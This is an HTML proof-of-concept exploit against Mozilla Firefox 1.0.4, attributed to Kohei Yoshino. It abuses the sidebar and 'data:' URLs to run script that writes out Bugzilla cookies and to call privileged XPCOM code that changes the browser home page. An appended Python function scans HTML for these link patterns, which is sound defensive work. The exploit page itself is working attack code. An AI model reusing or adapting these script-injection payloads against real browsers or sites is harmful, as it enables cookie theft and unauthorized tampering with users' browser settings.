Mozilla Firefox <= 1.0.4 "data:" URLs Remote Script Injection Exploit

// Exploit by Kohei Yoshino

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  <title>Sidebar Attack, Reloaded</title>
</head>
<body>
  <p>1. <a href="#" target="_search"
    onclick="location.href = 'https://bugzilla.mozilla.org/';">
    Click here to <strong>open this page into sidebar</strong>.</a></p>
  <p>2. <a href="data:text/html,<script>document.write(document.cookie);</script>">
    Click here to <strong>steal your cookies</strong> on Bugzilla.</a></p>
  <p>3. Then, open about:config in content area.</p>
  <p>4. <a href="data:text/html,<script>Components.classes['@mozilla.org/preferences-service;1'].getService(Components.interfaces.nsIPrefBranch).setCharPref('browser.startup.homepage','http://www.mozdev.org/');</script>">
    Click here to <strong>change your home page to mozdev.org</strong>.</a></p>
</body>
</html>
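A defensive check for the link patterns this proof of concept relies on, as an added example that is not part of the original exploit or of any Mozilla code: it scans HTML for links targeting the sidebar with target="_search" and for anchors whose href is a "data:" URL carrying script or XPCOM access. The function name audit_links, the finding labels and the sample markup are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import unquote

# Privileged XPCOM access inside a payload, as in step 4 of the page.
CHROME_MARKERS = ("components.classes", "components.interfaces")


class _LinkAuditor(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []  # list of (label, detail) tuples

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        a = {k: (v or "") for k, v in attrs}
        href = a.get("href", "").strip()
        # Link that loads its destination into the _search sidebar panel.
        if a.get("target", "").lower() == "_search":
            self.findings.append(("sidebar-target", a.get("onclick", "") or href))
        # data: URL whose percent-decoded body carries script.
        if href.lower().startswith("data:"):
            _, _, body = href.partition(",")
            decoded = unquote(body).lower()
            if "<script" in decoded:
                self.findings.append(("data-url-script", href[:60]))
            if any(marker in decoded for marker in CHROME_MARKERS):
                self.findings.append(("data-url-xpcom", href[:60]))


def audit_links(html):
    """Return (label, detail) findings for every suspicious <a> in html."""
    parser = _LinkAuditor()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample input modelled on the page's markup, with harmless payloads.
SAMPLE = """
<a href="#" target="_search" onclick="location.href='https://example.test/';">one</a>
<a href="data:text/html,<script>document.title='x';</script>">two</a>
<a href="data:text/html,%3Cscript%3EComponents.classes['x']%3C/script%3E">three</a>
<a href="https://example.test/data:ok">four</a>
<a href="data:text/plain,hello">five</a>
"""

if __name__ == "__main__":
    print(audit_links(SAMPLE))
```

The check decodes percent-encoding only; a base64-encoded "data:" body is not inspected and would need its own decoding step.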